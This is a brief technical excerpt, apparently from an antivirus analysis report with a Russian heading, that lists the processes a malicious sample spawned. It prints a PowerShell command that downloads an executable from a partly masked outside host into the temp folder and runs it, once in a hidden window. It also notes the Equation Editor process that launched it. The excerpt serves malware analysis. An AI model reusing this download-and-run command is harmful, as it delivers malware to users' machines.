Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell "try{$fH=$env:temp+'\FY.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://ki####fractory.com/shoki.exe' -Destination $fH;(New-Object -com Shell.Application).Shell...
- '<SYSTEM32>\cmd.exe' /c PowerShell "try{$fH=$env:temp+'\FY.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://ki####fractory.com/shoki.exe' -Destination $fH;(New-Object -com Shell.Application).Shell...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding